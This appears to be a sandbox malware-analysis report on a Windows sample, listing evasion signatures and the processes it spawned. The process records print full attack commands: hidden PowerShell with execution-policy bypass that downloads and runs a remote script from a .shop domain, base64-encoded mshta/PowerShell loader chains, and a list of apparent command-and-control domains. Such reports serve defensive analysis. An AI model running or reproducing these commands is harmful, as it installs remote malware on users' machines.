                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeMemory allocated: 26A56910000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeMemory allocated: 26A703E0000 memory reserve | memory write watch
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4487Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5327Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1201Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1459Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2681Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3826Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5855Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7395Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep count: 1201 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep count: 323 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep count: 1459 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep count: 2681 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 336Thread sleep count: 7395 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 00000013.00000002.3698386324.0000000003514000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3695295906.00000000034DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 0000000D.00000002.2211693774.0000000007121000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI call chain: ExitProcess graph end nodegraph_19-14577
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0043FC20 LdrInitializeThunk,19_2_0043FC20
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi32_7604.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi32_7700.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7604, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded Start-Process "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ArgumentList "-w hidden -ep bypass -nop -Command `"iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))`"" -WindowStyle Hidden
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded Start-Process "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ArgumentList "-w hidden -ep bypass -nop -Command `"iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))`"" -WindowStyle HiddenJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: powershell.exeString found in binary or memory: robinsharez.shop
                Source: powershell.exeString found in binary or memory: handscreamny.shop
                Source: powershell.exeString found in binary or memory: chipdonkeruz.shop
                Source: powershell.exeString found in binary or memory: versersleep.shop
                Source: powershell.exeString found in binary or memory: crowdwarek.shop
                Source: powershell.exeString found in binary or memory: apporholis.shop
                Source: powershell.exeString found in binary or memory: femalsabler.shop
                Source: powershell.exeString found in binary or memory: soundtappysk.shop
                Source: powershell.exeString found in binary or memory: quinceisoz.cam
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw==')))Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep unrestricted -w 1 sc $env:temp\a.ps1 ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('znvuy3rpb24gs0ziqygks3lhwxjvvuqpew0kkcgks3lhwxjvvuqglxnwbgl0iccopzw9xeculiknfcv7jevkdxauu3viu3ryaw5nkdmsmtawkvskx119ksaglwpvaw4gjycglxjlcgxhy2ugii4kiil9oyrfsnvwid0nawv4bxz7du4xautgzsjbt0v1vnk1im9zezzqbfbhlzphyjrjwi5pyjjxltdxo0nksfxneff3l016skfqcnqzqdzcfurojx5ubluoftbrc3nfacvoswzrkwm5wew4ncnaunltkm9hcdy1mdk1odm0ndewotm2ndmynda2mdk2otu4jw==')));cmd.exe /k start powershell -w 1 ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('cg93zxjzagvsbcatzw5jifv3qjbbr0vby2dcmefdmefvquj5quc4qvl3qmxbse1by3dbz0fdsufrd0e2quz3qvz3qnbbrzrbwkfcdkfiy0fjd0jjquznqwvrqnpbrmnbyndcm0fewufoqujjquzjqwfrqnvbr1fbyndcm0fitufvquj2quhjqvprqnlbrk1byufcbefhd0fiqujjquhzqu1rqxvbrefbwefcd0fhoefkd0jsquhjqwn3qm9br1vbykfcc0fdnefauui0qudvqulnqwdbqzbbuvfceufhy0fkuuj0qudvqwjnqjbbrxdbyvfcekfiuufjqufpqumwqwr3qwdbr2dbyvfca0fhuufauuj1qunbquxrqmxbsefbsufcaufia0fjqujoquhnqwn3qwdbqzbbymdcdkfiqufjquf0quvnqwj3qnrbrzbbwvfcdufhuufjqujnqunjqwfrqmxbsgdbsufbb0fdz0fuz0jsquhjquxrqlbbr0lbywdcbefhtufkqufnquznqwvrqnpbsffbwlfcdefdnefuz0jsquhrquxnqlhbr1vbwwdcrefhd0fhuujsquc0qwrbqxbbqzrbukfcdkfiy0fiz0jzquc4qvlrqmtbrk1bzefceufha0fiz0juqunnqup3qm9bsffbzefcd0fitufpz0f2qum4qwr3qmxbr0lbtgdcckfhd0fhuuj3qudrqwvrqjnbrzhbzwdccefia0fmz0j6qudnqwj3qndbqzhbyxdcmufhnefiz0joquhjquxnqndbrzrbwndbbkfda0f